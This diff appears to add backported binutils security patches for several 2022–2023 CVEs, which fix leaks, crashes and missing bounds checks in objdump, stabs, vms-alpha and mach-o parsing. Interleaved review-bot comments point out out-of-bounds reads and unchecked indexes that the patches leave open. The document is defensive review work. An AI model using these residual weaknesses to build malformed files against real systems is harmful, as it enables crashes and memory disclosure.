+Upstream-Status: Backport [https://sourceware.org/git/?p=binutils-gdb.git;a=commitdiff_plain;h=0d02e70b197c786f26175b9a73f94e01d14abdab]
+CVE: CVE-2022-47010
+Signed-off-by: Virendra Thakur <virendrak@kpit.com>
+Comment: Patch refreshed based on codebase.
+---
+ binutils/prdbg.c | 7 ++-----
+ 1 file changed, 2 insertions(+), 5 deletions(-)
+
+diff --git a/binutils/prdbg.c b/binutils/prdbg.c
+index c1e41628d26..bb42a5b6c2d 100644
+--- a/binutils/prdbg.c
++++ b/binutils/prdbg.c
+@@ -778,12 +778,9 @@
+
+ strcat (s, ")");
+
+- if (! substitute_type (info, s))
+- return FALSE;
+-
++ bfd_boolean ret = substitute_type (info, s);
+ free (s);
+-
+- return TRUE;
++ return ret;
+ }
+
+ /* Turn the top type on the stack into a reference to that type. */
diff --git a/meta/recipes-devtools/binutils/binutils/CVE-2022-47011.patch b/meta/recipes-devtools/binutils/binutils/CVE-2022-47011.patch
new file mode 100644
index 0000000000..250756bd38
--- /dev/null
+++ b/meta/recipes-devtools/binutils/binutils/CVE-2022-47011.patch
@@ -0,0 +1,31 @@
+From 8a24927bc8dbf6beac2000593b21235c3796dc35 Mon Sep 17 00:00:00 2001
+From: Alan Modra <amodra@gmail.com>
+Date: Mon, 20 Jun 2022 10:39:13 +0930
+Subject: [PATCH] PR29261, memory leak in parse_stab_struct_fields
+
+ PR 29261
+ * stabs.c (parse_stab_struct_fields): Free "fields" on failure path.
+Upstream-Status: Backport [https://sourceware.org/git/?p=binutils-gdb.git;a=commitdiff_plain;h=8a24927bc8dbf6beac2000593b21235c3796dc35]
+CVE: CVE-2022-47011
+Signed-off-by: Virendra Thakur <virendrak@kpit.com>
+Comment: Patch refreshed based on codebase.
+---
+ binutils/stabs.c | 5 ++++-
+ 1 file changed, 4 insertions(+), 1 deletion(-)
+
+diff --git a/binutils/stabs.c b/binutils/stabs.c
+index 796ff85b86a..bf3f578cbcc 100644
+--- a/binutils/stabs.c
++++ b/binutils/stabs.c
+@@ -2368,7 +2368,10 @@
+
+ if (! parse_stab_one_struct_field (dhandle, info, pp, p, fields + c,
+ staticsp, p_end))
+- return FALSE;
++ {
++ free (fields);
++ return FALSE;
++ }
+
+ ++c;
+ }
diff --git a/meta/recipes-devtools/binutils/binutils/CVE-2022-47695.patch b/meta/recipes-devtools/binutils/binutils/CVE-2022-47695.patch
new file mode 100644
index 0000000000..101a4cdb4e
--- /dev/null
+++ b/meta/recipes-devtools/binutils/binutils/CVE-2022-47695.patch
@@ -0,0 +1,57 @@
+From 3d3af4ba39e892b1c544d667ca241846bc3df386 Mon Sep 17 00:00:00 2001
+From: Alan Modra <amodra@gmail.com>
+Date: Sun, 4 Dec 2022 22:15:40 +1030
+Subject: [PATCH] PR29846, segmentation fault in objdump.c compare_symbols
+
+Fixes a fuzzed object file problem where plt relocs were manipulated
+in such a way that two synthetic symbols were generated at the same
+plt location. Won't occur in real object files.
+
+ PR 29846
+ PR 20337
+ * objdump.c (compare_symbols): Test symbol flags to exclude
+ section and synthetic symbols before attempting to check flavour.
+Upstream-Status: Backport [https://sourceware.org/git/?p=binutils-gdb.git;a=commitdiff;h=3d3af4ba39e892b1c544d667ca241846bc3df386]
+CVE: CVE-2022-47695
+Signed-off-by: Virendra Thakur <virendrak@kpit.com>
+Comment: Patch refreshed based on codebase.
+---
+ binutils/objdump.c | 23 ++++++++++-------------
+ 1 file changed, 10 insertions(+), 13 deletions(-)
+
+diff --git a/binutils/objdump.c b/binutils/objdump.c
+index e8481b2d928..d95c8b68bf0 100644
+--- a/binutils/objdump.c
++++ b/binutils/objdump.c
+@@ -935,20 +935,17 @@
+ return 1;
+ }
+
+- if (bfd_get_flavour (bfd_asymbol_bfd (a)) == bfd_target_elf_flavour
++ /* Sort larger size ELF symbols before smaller. See PR20337. */
++ bfd_vma asz = 0;
++ if ((a->flags & (BSF_SECTION_SYM | BSF_SYNTHETIC)) == 0
++ && bfd_get_flavour (bfd_asymbol_bfd (a)) == bfd_target_elf_flavour)
++ asz = ((elf_symbol_type *) a)->internal_elf_sym.st_size;
++ bfd_vma bsz = 0;
++ if ((b->flags & (BSF_SECTION_SYM | BSF_SYNTHETIC)) == 0
+ && bfd_get_flavour (bfd_asymbol_bfd (b)) == bfd_target_elf_flavour)
+- {
+- bfd_vma asz, bsz;
+-
+- asz = 0;
+- if ((a->flags & (BSF_SECTION_SYM | BSF_SYNTHETIC)) == 0)
+- asz = ((elf_symbol_type *) a)->internal_elf_sym.st_size;
+- bsz = 0;
+- if ((b->flags & (BSF_SECTION_SYM | BSF_SYNTHETIC)) == 0)
+- bsz = ((elf_symbol_type *) b)->internal_elf_sym.st_size;
+- if (asz != bsz)
+- return asz > bsz ? -1 : 1;
+- }
++ bsz = ((elf_symbol_type *) b)->internal_elf_sym.st_size;
++ if (asz != bsz)
++ return asz > bsz ? -1 : 1;
+
+ /* Symbols that start with '.' might be section names, so sort them
+ after symbols that don't start with '.'. */
+
diff --git a/meta/recipes-devtools/binutils/binutils/CVE-2022-48063.patch b/meta/recipes-devtools/binutils/binutils/CVE-2022-48063.patch
new file mode 100644
index 0000000000..f41c02a02b
--- /dev/null
+++ b/meta/recipes-devtools/binutils/binutils/CVE-2022-48063.patch
@@ -0,0 +1,49 @@
+From 75393a2d54bcc40053e5262a3de9d70c5ebfbbfd Mon Sep 17 00:00:00 2001
+From: Nick Clifton <nickc@redhat.com>
+Date: Wed, 21 Dec 2022 11:51:23 +0000
+Subject: [PATCH] Fix an attempt to allocate an unreasonably large amount of
+ memory when parsing a corrupt ELF file.
+
+ PR 29924
+ * objdump.c (load_specific_debug_section): Check for excessively
+ large sections.
+Upstream-Status: Backport [https://sourceware.org/git/gitweb.cgi?p=binutils-gdb.git;h=75393a2d54bcc40053e5262a3de9d70c5ebfbbfd]
+CVE: CVE-2022-48063
+Signed-off-by: Virendra Thakur <virendrak@kpit.com>
+Comment: Patch refreshed based on codebase.
+---
+ binutils/ChangeLog | 6 ++++++
+ binutils/objdump.c | 4 +++-
+ 2 files changed, 9 insertions(+), 1 deletion(-)
+
+diff --git a/binutils/ChangeLog b/binutils/ChangeLog
+index e7f918d3f65..020e09f3700 100644
+--- a/binutils/ChangeLog
++++ b/binutils/ChangeLog
+@@ -1,3 +1,9 @@
++2022-12-21 Nick Clifton <nickc@redhat.com>
++
++ PR 29924
++ * objdump.c (load_specific_debug_section): Check for excessively
++ large sections.
++
+ 2021-02-11 Alan Modra <amodra@gmail.com>
+
+ PR 27290
+
+diff --git a/binutils/objdump.c b/binutils/objdump.c
+index d51abbe3858..2eb02de0e76 100644
+--- a/binutils/objdump.c
++++ b/binutils/objdump.c
+@@ -3479,7 +3479,9 @@
+ section->size = bfd_section_size (sec);
+ /* PR 24360: On 32-bit hosts sizeof (size_t) < sizeof (bfd_size_type). */
+ alloced = amt = section->size + 1;
+- if (alloced != amt || alloced == 0)
++ if (alloced != amt
++ || alloced == 0
++ || (bfd_get_size (abfd) != 0 && alloced >= bfd_get_size (abfd)))
+ {
+ section->start = NULL;
+ free_debug_section (debug);
+
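Review bot: The new upper bound in load_specific_debug_section is only enforced when `bfd_get_size (abfd)` is non-zero, so for a BFD whose file size cannot be determined the `alloced != amt || alloced == 0` tests remain the only limit on the allocation. That fail-open case deserves a comment above the condition, e.g. `/* bfd_get_size () == 0 presumably means the file size is unknown; the section is then not bounded by it.  */`. It is also worth confirming that `bfd_section_size` never reports a decompressed size here, since a well-formed compressed debug section could be larger than the file and would then be rejected by `alloced >= bfd_get_size (abfd)`. The function body continues outside the inner hunk.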
diff --git a/meta/recipes-devtools/binutils/binutils/CVE-2023-25584.patch b/meta/recipes-devtools/binutils/binutils/CVE-2023-25584.patch
new file mode 100644
index 0000000000..732ea43210
--- /dev/null
+++ b/meta/recipes-devtools/binutils/binutils/CVE-2023-25584.patch
@@ -0,0 +1,530 @@
+CVE: CVE-2023-25584
+Upstream-Status: Backport [ import from ubuntu http://archive.ubuntu.com/ubuntu/pool/main/b/binutils/binutils_2.34-6ubuntu1.7.debian.tar.xz upstream https://sourceware.org/git/gitweb.cgi?p=binutils-gdb.git;h=77c225bdeb410cf60da804879ad41622f5f1aa44 ]
+Signed-off-by: Lee Chee Yang <chee.yang.lee@intel.com>
+
+[Ubuntu note: this is backport of the original patch, no major changes just
+ fix this patch for this release]
+From 77c225bdeb410cf60da804879ad41622f5f1aa44 Mon Sep 17 00:00:00 2001
+From: Alan Modra <amodra@gmail.com>
+Date: Mon, 12 Dec 2022 18:28:49 +1030
+Subject: [PATCH] Lack of bounds checking in vms-alpha.c parse_module
+
+ PR 29873
+ PR 29874
+ PR 29875
+ PR 29876
+ PR 29877
+ PR 29878
+ PR 29879
+ PR 29880
+ PR 29881
+ PR 29882
+ PR 29883
+ PR 29884
+ PR 29885
+ PR 29886
+ PR 29887
+ PR 29888
+ PR 29889
+ PR 29890
+ PR 29891
+ * vms-alpha.c (parse_module): Make length param bfd_size_type.
+ Delete length == -1 checks. Sanity check record_length.
+ Sanity check DST__K_MODBEG, DST__K_RTNBEG, DST__K_RTNEND lengths.
+ Sanity check DST__K_SOURCE and DST__K_LINE_NUM elements
+ before accessing.
+ (build_module_list): Pass dst_section size to parse_module.
+---
+ bfd/vms-alpha.c | 213 ++++++++++++++++++++++++++++++++++++++----------
+ 1 file changed, 168 insertions(+), 45 deletions(-)
+
+--- binutils-2.34.orig/bfd/vms-alpha.c
++++ binutils-2.34/bfd/vms-alpha.c
+@@ -4267,7 +4267,7 @@ new_module (bfd *abfd)
+
+ static void
+ parse_module (bfd *abfd, struct module *module, unsigned char *ptr,
+- int length)
++ bfd_size_type length)
+ {
+ unsigned char *maxptr = ptr + length;
+ unsigned char *src_ptr, *pcl_ptr;
+@@ -4284,7 +4284,7 @@ parse_module (bfd *abfd, struct module *
+ curr_line = (struct lineinfo *) bfd_zalloc (abfd, sizeof (struct lineinfo));
+ module->line_table = curr_line;
+
+- while (length == -1 || ptr < maxptr)
++ while (ptr < maxptr)
+ {
+ /* The first byte is not counted in the recorded length. */
+ int rec_length = bfd_getl16 (ptr) + 1;
+@@ -4292,15 +4292,19 @@ parse_module (bfd *abfd, struct module *
+
+ vms_debug2 ((2, "DST record: leng %d, type %d\n", rec_length, rec_type));
+
+- if (length == -1 && rec_type == DST__K_MODEND)
++ if (rec_length > maxptr - ptr)
++ break;
++ if (rec_type == DST__K_MODEND)
+ break;
+
+ switch (rec_type)
+ {
+ case DST__K_MODBEG:
++ if (rec_length <= DST_S_B_MODBEG_NAME)
++ break;
+ module->name
+ = _bfd_vms_save_counted_string (abfd, ptr + DST_S_B_MODBEG_NAME,
+- maxptr - (ptr + DST_S_B_MODBEG_NAME));
++ rec_length - DST_S_B_MODBEG_NAME);
+
+ curr_pc = 0;
+ prev_pc = 0;
+@@ -4314,11 +4318,13 @@ parse_module (bfd *abfd, struct module *
+ break;
+
+ case DST__K_RTNBEG:
++ if (rec_length <= DST_S_B_RTNBEG_NAME)
++ break;
+ funcinfo = (struct funcinfo *)
+ bfd_zalloc (abfd, sizeof (struct funcinfo));
+ funcinfo->name
+ = _bfd_vms_save_counted_string (abfd, ptr + DST_S_B_RTNBEG_NAME,
+- maxptr - (ptr + DST_S_B_RTNBEG_NAME));
++ rec_length - DST_S_B_RTNBEG_NAME);
+ funcinfo->low = bfd_getl32 (ptr + DST_S_L_RTNBEG_ADDRESS);
+ funcinfo->next = module->func_table;
+ module->func_table = funcinfo;
+@@ -4328,6 +4334,8 @@ parse_module (bfd *abfd, struct module *
+ break;
+
+ case DST__K_RTNEND:
++ if (rec_length < DST_S_L_RTNEND_SIZE + 4)
++ break;
+ module->func_table->high = module->func_table->low
+ + bfd_getl32 (ptr + DST_S_L_RTNEND_SIZE) - 1;
+
+@@ -4358,13 +4366,66 @@ parse_module (bfd *abfd, struct module *
+
+ vms_debug2 ((3, "source info\n"));
+
+- while (src_ptr < ptr + rec_length)
++ while (src_ptr - ptr < rec_length)
+ {
+ int cmd = src_ptr[0], cmd_length, data;
+
+ switch (cmd)
+ {
+ case DST__K_SRC_DECLFILE:
++ if (src_ptr - ptr + DST_S_B_SRC_DF_LENGTH >= rec_length)
++ cmd_length = 0x10000;
++ else
++ cmd_length = src_ptr[DST_S_B_SRC_DF_LENGTH] + 2;
++ break;
++
++ case DST__K_SRC_DEFLINES_B:
++ cmd_length = 2;
++ break;
++
++ case DST__K_SRC_DEFLINES_W:
++ cmd_length = 3;
++ break;
++
++ case DST__K_SRC_INCRLNUM_B:
++ cmd_length = 2;
++ break;
++
++ case DST__K_SRC_SETFILE:
++ cmd_length = 3;
++ break;
++
++ case DST__K_SRC_SETLNUM_L:
++ cmd_length = 5;
++ break;
++
++ case DST__K_SRC_SETLNUM_W:
++ cmd_length = 3;
++ break;
++
++ case DST__K_SRC_SETREC_L:
++ cmd_length = 5;
++ break;
++
++ case DST__K_SRC_SETREC_W:
++ cmd_length = 3;
++ break;
++
++ case DST__K_SRC_FORMFEED:
++ cmd_length = 1;
++ break;
++
++ default:
++ cmd_length = 2;
++ break;
++ }
++
++ if (src_ptr - ptr + cmd_length > rec_length)
++ break;
++
++ switch (cmd)
++ {
++ case DST__K_SRC_DECLFILE:
+ {
+ unsigned int fileid
+ = bfd_getl16 (src_ptr + DST_S_W_SRC_DF_FILEID);
+@@ -4384,7 +4445,6 @@ parse_module (bfd *abfd, struct module *
+
+ module->file_table [fileid].name = filename;
+ module->file_table [fileid].srec = 1;
+- cmd_length = src_ptr[DST_S_B_SRC_DF_LENGTH] + 2;
+ vms_debug2 ((4, "DST_S_C_SRC_DECLFILE: %d, %s\n",
+ fileid, module->file_table [fileid].name));
+ }
+@@ -4401,7 +4461,6 @@ parse_module (bfd *abfd, struct module *
+ srec->sfile = curr_srec->sfile;
+ curr_srec->next = srec;
+ curr_srec = srec;
+- cmd_length = 2;
+ vms_debug2 ((4, "DST_S_C_SRC_DEFLINES_B: %d\n", data));
+ break;
+
+@@ -4416,14 +4475,12 @@ parse_module (bfd *abfd, struct module *
+ srec->sfile = curr_srec->sfile;
+ curr_srec->next = srec;
+ curr_srec = srec;
+- cmd_length = 3;
+ vms_debug2 ((4, "DST_S_C_SRC_DEFLINES_W: %d\n", data));
+ break;
+
+ case DST__K_SRC_INCRLNUM_B:
+ data = src_ptr[DST_S_B_SRC_UNSBYTE];
+ curr_srec->line += data;
+- cmd_length = 2;
+ vms_debug2 ((4, "DST_S_C_SRC_INCRLNUM_B: %d\n", data));
+ break;
+
+@@ -4431,21 +4488,18 @@ parse_module (bfd *abfd, struct module *
+ data = bfd_getl16 (src_ptr + DST_S_W_SRC_UNSWORD);
+ curr_srec->sfile = data;
+ curr_srec->srec = module->file_table[data].srec;
+- cmd_length = 3;
+ vms_debug2 ((4, "DST_S_C_SRC_SETFILE: %d\n", data));
+ break;
+
+ case DST__K_SRC_SETLNUM_L:
+ data = bfd_getl32 (src_ptr + DST_S_L_SRC_UNSLONG);
+ curr_srec->line = data;
+- cmd_length = 5;
+ vms_debug2 ((4, "DST_S_C_SRC_SETLNUM_L: %d\n", data));
+ break;
+
+ case DST__K_SRC_SETLNUM_W:
+ data = bfd_getl16 (src_ptr + DST_S_W_SRC_UNSWORD);
+ curr_srec->line = data;
+- cmd_length = 3;
+ vms_debug2 ((4, "DST_S_C_SRC_SETLNUM_W: %d\n", data));
+ break;
+
+@@ -4453,7 +4507,6 @@ parse_module (bfd *abfd, struct module *
+ data = bfd_getl32 (src_ptr + DST_S_L_SRC_UNSLONG);
+ curr_srec->srec = data;
+ module->file_table[curr_srec->sfile].srec = data;
+- cmd_length = 5;
+ vms_debug2 ((4, "DST_S_C_SRC_SETREC_L: %d\n", data));
+ break;
+
+@@ -4461,19 +4514,16 @@ parse_module (bfd *abfd, struct module *
+ data = bfd_getl16 (src_ptr + DST_S_W_SRC_UNSWORD);
+ curr_srec->srec = data;
+ module->file_table[curr_srec->sfile].srec = data;
+- cmd_length = 3;
+ vms_debug2 ((4, "DST_S_C_SRC_SETREC_W: %d\n", data));
+ break;
+
+ case DST__K_SRC_FORMFEED:
+- cmd_length = 1;
+ vms_debug2 ((4, "DST_S_C_SRC_FORMFEED\n"));
+ break;
+
+ default:
+ _bfd_error_handler (_("unknown source command %d"),
+ cmd);
+- cmd_length = 2;
+ break;
+ }
+
+@@ -4486,7 +4536,7 @@ parse_module (bfd *abfd, struct module *
+
+ vms_debug2 ((3, "line info\n"));
+
+- while (pcl_ptr < ptr + rec_length)
++ while (pcl_ptr - ptr < rec_length)
+ {
+ /* The command byte is signed so we must sign-extend it. */
+ int cmd = ((signed char *)pcl_ptr)[0], cmd_length, data;
+@@ -4494,10 +4544,106 @@ parse_module (bfd *abfd, struct module *
+ switch (cmd)
+ {
+ case DST__K_DELTA_PC_W:
++ cmd_length = 3;
++ break;
++
++ case DST__K_DELTA_PC_L:
++ cmd_length = 5;
++ break;
++
++ case DST__K_INCR_LINUM:
++ cmd_length = 2;
++ break;
++
++ case DST__K_INCR_LINUM_W:
++ cmd_length = 3;
++ break;
++
++ case DST__K_INCR_LINUM_L:
++ cmd_length = 5;
++ break;
++
++ case DST__K_SET_LINUM_INCR:
++ cmd_length = 2;
++ break;
++
++ case DST__K_SET_LINUM_INCR_W:
++ cmd_length = 3;
++ break;
++
++ case DST__K_RESET_LINUM_INCR:
++ cmd_length = 1;
++ break;
++
++ case DST__K_BEG_STMT_MODE:
++ cmd_length = 1;
++ break;
++
++ case DST__K_END_STMT_MODE:
++ cmd_length = 1;
++ break;
++
++ case DST__K_SET_LINUM_B:
++ cmd_length = 2;
++ break;
++
++ case DST__K_SET_LINUM:
++ cmd_length = 3;
++ break;
++
++ case DST__K_SET_LINUM_L:
++ cmd_length = 5;
++ break;
++
++ case DST__K_SET_PC:
++ cmd_length = 2;
++ break;
++
++ case DST__K_SET_PC_W:
++ cmd_length = 3;
++ break;
++
++ case DST__K_SET_PC_L:
++ cmd_length = 5;
++ break;
++
++ case DST__K_SET_STMTNUM:
++ cmd_length = 2;
++ break;
++
++ case DST__K_TERM:
++ cmd_length = 2;
++ break;
++
++ case DST__K_TERM_W:
++ cmd_length = 3;
++ break;
++
++ case DST__K_TERM_L:
++ cmd_length = 5;
++ break;
++
++ case DST__K_SET_ABS_PC:
++ cmd_length = 5;
++ break;
++
++ default:
++ if (cmd <= 0)
++ cmd_length = 1;
++ else
++ cmd_length = 2;
++ break;
++ }
++
++ if (pcl_ptr - ptr + cmd_length > rec_length)
++ break;
++
++ switch (cmd)
++ {
++ case DST__K_DELTA_PC_W:
+ data = bfd_getl16 (pcl_ptr + DST_S_W_PCLINE_UNSWORD);
+ curr_pc += data;
+ curr_linenum += 1;
+- cmd_length = 3;
+ vms_debug2 ((4, "DST__K_DELTA_PC_W: %d\n", data));
+ break;
+
+@@ -4505,131 +4651,111 @@ parse_module (bfd *abfd, struct module *
+ data = bfd_getl32 (pcl_ptr + DST_S_L_PCLINE_UNSLONG);
+ curr_pc += data;
+ curr_linenum += 1;
+- cmd_length = 5;
+ vms_debug2 ((4, "DST__K_DELTA_PC_L: %d\n", data));
+ break;
+
+ case DST__K_INCR_LINUM:
+ data = pcl_ptr[DST_S_B_PCLINE_UNSBYTE];
+ curr_linenum += data;
+- cmd_length = 2;
+ vms_debug2 ((4, "DST__K_INCR_LINUM: %d\n", data));
+ break;
+
+ case DST__K_INCR_LINUM_W:
+ data = bfd_getl16 (pcl_ptr + DST_S_W_PCLINE_UNSWORD);
+ curr_linenum += data;
+- cmd_length = 3;
+ vms_debug2 ((4, "DST__K_INCR_LINUM_W: %d\n", data));
+ break;
+
+ case DST__K_INCR_LINUM_L:
+ data = bfd_getl32 (pcl_ptr + DST_S_L_PCLINE_UNSLONG);
+ curr_linenum += data;
+- cmd_length = 5;
+ vms_debug2 ((4, "DST__K_INCR_LINUM_L: %d\n", data));
+ break;
+
+ case DST__K_SET_LINUM_INCR:
+ _bfd_error_handler
+ (_("%s not implemented"), "DST__K_SET_LINUM_INCR");
+- cmd_length = 2;
+ break;
+
+ case DST__K_SET_LINUM_INCR_W:
+ _bfd_error_handler
+ (_("%s not implemented"), "DST__K_SET_LINUM_INCR_W");
+- cmd_length = 3;
+ break;
+
+ case DST__K_RESET_LINUM_INCR:
+ _bfd_error_handler
+ (_("%s not implemented"), "DST__K_RESET_LINUM_INCR");
+- cmd_length = 1;
+ break;
+
+ case DST__K_BEG_STMT_MODE:
+ _bfd_error_handler
+ (_("%s not implemented"), "DST__K_BEG_STMT_MODE");
+- cmd_length = 1;
+ break;
+
+ case DST__K_END_STMT_MODE:
+ _bfd_error_handler
+ (_("%s not implemented"), "DST__K_END_STMT_MODE");
+- cmd_length = 1;
+ break;
+
+ case DST__K_SET_LINUM_B:
+ data = pcl_ptr[DST_S_B_PCLINE_UNSBYTE];
+ curr_linenum = data;
+- cmd_length = 2;
+ vms_debug2 ((4, "DST__K_SET_LINUM_B: %d\n", data));
+ break;
+
+ case DST__K_SET_LINUM:
+ data = bfd_getl16 (pcl_ptr + DST_S_W_PCLINE_UNSWORD);
+ curr_linenum = data;
+- cmd_length = 3;
+ vms_debug2 ((4, "DST__K_SET_LINE_NUM: %d\n", data));
+ break;
+
+ case DST__K_SET_LINUM_L:
+ data = bfd_getl32 (pcl_ptr + DST_S_L_PCLINE_UNSLONG);
+ curr_linenum = data;
+- cmd_length = 5;
+ vms_debug2 ((4, "DST__K_SET_LINUM_L: %d\n", data));
+ break;
+
+ case DST__K_SET_PC:
+ _bfd_error_handler
+ (_("%s not implemented"), "DST__K_SET_PC");
+- cmd_length = 2;
+ break;
+
+ case DST__K_SET_PC_W:
+ _bfd_error_handler
+ (_("%s not implemented"), "DST__K_SET_PC_W");
+- cmd_length = 3;
+ break;
+
+ case DST__K_SET_PC_L:
+ _bfd_error_handler
+ (_("%s not implemented"), "DST__K_SET_PC_L");
+- cmd_length = 5;
+ break;
+
+ case DST__K_SET_STMTNUM:
+ _bfd_error_handler
+ (_("%s not implemented"), "DST__K_SET_STMTNUM");
+- cmd_length = 2;
+ break;
+
+ case DST__K_TERM:
+ data = pcl_ptr[DST_S_B_PCLINE_UNSBYTE];
+ curr_pc += data;
+- cmd_length = 2;
+ vms_debug2 ((4, "DST__K_TERM: %d\n", data));
+ break;
+
+ case DST__K_TERM_W:
+ data = bfd_getl16 (pcl_ptr + DST_S_W_PCLINE_UNSWORD);
+ curr_pc += data;
+- cmd_length = 3;
+ vms_debug2 ((4, "DST__K_TERM_W: %d\n", data));
+ break;
+
+ case DST__K_TERM_L:
+ data = bfd_getl32 (pcl_ptr + DST_S_L_PCLINE_UNSLONG);
+ curr_pc += data;
+- cmd_length = 5;
+ vms_debug2 ((4, "DST__K_TERM_L: %d\n", data));
+ break;
+
+ case DST__K_SET_ABS_PC:
+ data = bfd_getl32 (pcl_ptr + DST_S_L_PCLINE_UNSLONG);
+ curr_pc = data;
+- cmd_length = 5;
+ vms_debug2 ((4, "DST__K_SET_ABS_PC: 0x%x\n", data));
+ break;
+
+@@ -4638,15 +4764,11 @@ parse_module (bfd *abfd, struct module *
+ {
+ curr_pc -= cmd;
+ curr_linenum += 1;
+- cmd_length = 1;
+ vms_debug2 ((4, "bump pc to 0x%lx and line to %d\n",
+ (unsigned long)curr_pc, curr_linenum));
+ }
+ else
+- {
+- _bfd_error_handler (_("unknown line command %d"), cmd);
+- cmd_length = 2;
+- }
++ _bfd_error_handler (_("unknown line command %d"), cmd);
+ break;
+ }
+
+@@ -4778,7 +4900,7 @@ build_module_list (bfd *abfd)
+ return NULL;
+
+ module = new_module (abfd);
+- parse_module (abfd, module, PRIV (dst_section)->contents, -1);
++ parse_module (abfd, module, PRIV (dst_section)->contents, PRIV (dst_section)->size);
+ list = module;
+ }
+
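Review bot: The record header in parse_module is still read before it is known to lie inside the buffer: `while (ptr < maxptr)` guarantees a single byte, yet `bfd_getl16 (ptr)` reads two, and the record type is fetched before the new `rec_length > maxptr - ptr` test runs (the line that reads it sits between the inner hunks). A section that ends one or two bytes into a header would therefore still be read past its end. Tightening the guard to the header size closes that, e.g. `while (maxptr - ptr >= 3)` if the header is the 16-bit length plus one type byte. Separately, the DST__K_RTNEND case dereferences `module->func_table` without checking that a DST__K_RTNBEG record came first, and the `data` value that indexes `module->file_table` in the DST__K_SRC_SETFILE case is not range-checked in the visible lines.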
diff --git a/meta/recipes-devtools/binutils/binutils/CVE-2023-25588.patch b/meta/recipes-devtools/binutils/binutils/CVE-2023-25588.patch
new file mode 100644
index 0000000000..aa5ce5f3ff
--- /dev/null
+++ b/meta/recipes-devtools/binutils/binutils/CVE-2023-25588.patch
@@ -0,0 +1,149 @@
+From d12f8998d2d086f0a6606589e5aedb7147e6f2f1 Mon Sep 17 00:00:00 2001
+From: Alan Modra <amodra@gmail.com>
+Date: Fri, 14 Oct 2022 10:30:21 +1030
+Subject: [PATCH] PR29677, Field `the_bfd` of `asymbol` is uninitialised
+
+Besides not initialising the_bfd of synthetic symbols, counting
+symbols when sizing didn't match symbols created if there were any
+dynsyms named "". We don't want synthetic symbols without names
+anyway, so get rid of them. Also, simplify and correct sanity checks.
+
+ PR 29677
+ * mach-o.c (bfd_mach_o_get_synthetic_symtab): Rewrite.
+---
+Upstream-Status: Backport from [https://sourceware.org/git/?p=binutils-gdb.git;a=patch;h=d12f8998d2d086f0a6606589e5aedb7147e6f2f1]
+CVE: CVE-2023-25588
+CVE: CVE-2022-47696
+
+Signed-off-by: Ashish Sharma <asharma@mvista.com>
+Signed-off-by: poojitha adireddy <pooadire@cisco.com>
+
+ bfd/mach-o.c | 72 ++++++++++++++++++++++------------------------------
+ 1 file changed, 31 insertions(+), 41 deletions(-)
+
+diff --git a/bfd/mach-o.c b/bfd/mach-o.c
+index acb35e7f0c6..5279343768c 100644
+--- a/bfd/mach-o.c
++++ b/bfd/mach-o.c
+@@ -938,11 +938,9 @@ bfd_mach_o_get_synthetic_symtab (bfd *abfd,
+ bfd_mach_o_symtab_command *symtab = mdata->symtab;
+ asymbol *s;
+ char * s_start;
+- char * s_end;
+ unsigned long count, i, j, n;
+ size_t size;
+ char *names;
+- char *nul_name;
+ const char stub [] = "$stub";
+
+ *ret = NULL;
+@@ -955,27 +953,27 @@ bfd_mach_o_get_synthetic_symtab (bfd *abfd,
+ /* We need to allocate a bfd symbol for every indirect symbol and to
+ allocate the memory for its name. */
+ count = dysymtab->nindirectsyms;
+- size = count * sizeof (asymbol) + 1;
+-
++ size = 0;
+ for (j = 0; j < count; j++)
+ {
+- const char * strng;
+ unsigned int isym = dysymtab->indirect_syms[j];
++ const char *str;
+
+ /* Some indirect symbols are anonymous. */
+- if (isym < symtab->nsyms && (strng = symtab->symbols[isym].symbol.name))
+- /* PR 17512: file: f5b8eeba. */
+- size += strnlen (strng, symtab->strsize - (strng - symtab->strtab)) + sizeof (stub);
++ if (isym < symtab->nsyms
++ && (str = symtab->symbols[isym].symbol.name) != NULL)
++ {
++ /* PR 17512: file: f5b8eeba. */
++ size += strnlen (str, symtab->strsize - (str - symtab->strtab));
++ size += sizeof (stub);
++ }
+ }
+
+- s_start = bfd_malloc (size);
++ s_start = bfd_malloc (size + count * sizeof (asymbol));
+ s = *ret = (asymbol *) s_start;
+ if (s == NULL)
+ return -1;
+ names = (char *) (s + count);
+- nul_name = names;
+- *names++ = 0;
+- s_end = s_start + size;
+
+ n = 0;
+ for (i = 0; i < mdata->nsects; i++)
+@@ -997,47 +995,39 @@ bfd_mach_o_get_synthetic_symtab (bfd *abfd,
+ entry_size = bfd_mach_o_section_get_entry_size (abfd, sec);
+
+ /* PR 17512: file: 08e15eec. */
+- if (first >= count || last >= count || first > last)
++ if (first >= count || last > count || first > last)
+ goto fail;
+
+ for (j = first; j < last; j++)
+ {
+ unsigned int isym = dysymtab->indirect_syms[j];
+-
+- /* PR 17512: file: 04d64d9b. */
+- if (((char *) s) + sizeof (* s) > s_end)
+- goto fail;
+-
+- s->flags = BSF_GLOBAL | BSF_SYNTHETIC;
+- s->section = sec->bfdsection;
+- s->value = addr - sec->addr;
+- s->udata.p = NULL;
++ const char *str;
++ size_t len;
+
+ if (isym < symtab->nsyms
+- && symtab->symbols[isym].symbol.name)
++ && (str = symtab->symbols[isym].symbol.name) != NULL)
+ {
+- const char *sym = symtab->symbols[isym].symbol.name;
+- size_t len;
+-
+- s->name = names;
+- len = strlen (sym);
+- /* PR 17512: file: 47dfd4d2. */
+- if (names + len >= s_end)
++ /* PR 17512: file: 04d64d9b. */
++ if (n >= count)
+ goto fail;
+- memcpy (names, sym, len);
+- names += len;
+- /* PR 17512: file: 18f340a4. */
+- if (names + sizeof (stub) >= s_end)
++ len = strnlen (str, symtab->strsize - (str - symtab->strtab));
++ /* PR 17512: file: 47dfd4d2, 18f340a4. */
++ if (size < len + sizeof (stub))
+ goto fail;
+- memcpy (names, stub, sizeof (stub));
+- names += sizeof (stub);
++ memcpy (names, str, len);
++ memcpy (names + len, stub, sizeof (stub));
++ s->name = names;
++ names += len + sizeof (stub);
++ size -= len + sizeof (stub);
++ s->the_bfd = symtab->symbols[isym].symbol.the_bfd;
++ s->flags = BSF_GLOBAL | BSF_SYNTHETIC;
++ s->section = sec->bfdsection;
++ s->value = addr - sec->addr;
++ s->udata.p = NULL;
++ s++;
++ n++;
+ }
+- else
+- s->name = nul_name;
+-
+ addr += entry_size;
+- s++;
+- n++;
+ }
+ break;
+ default:
+--
+2.39.3
+
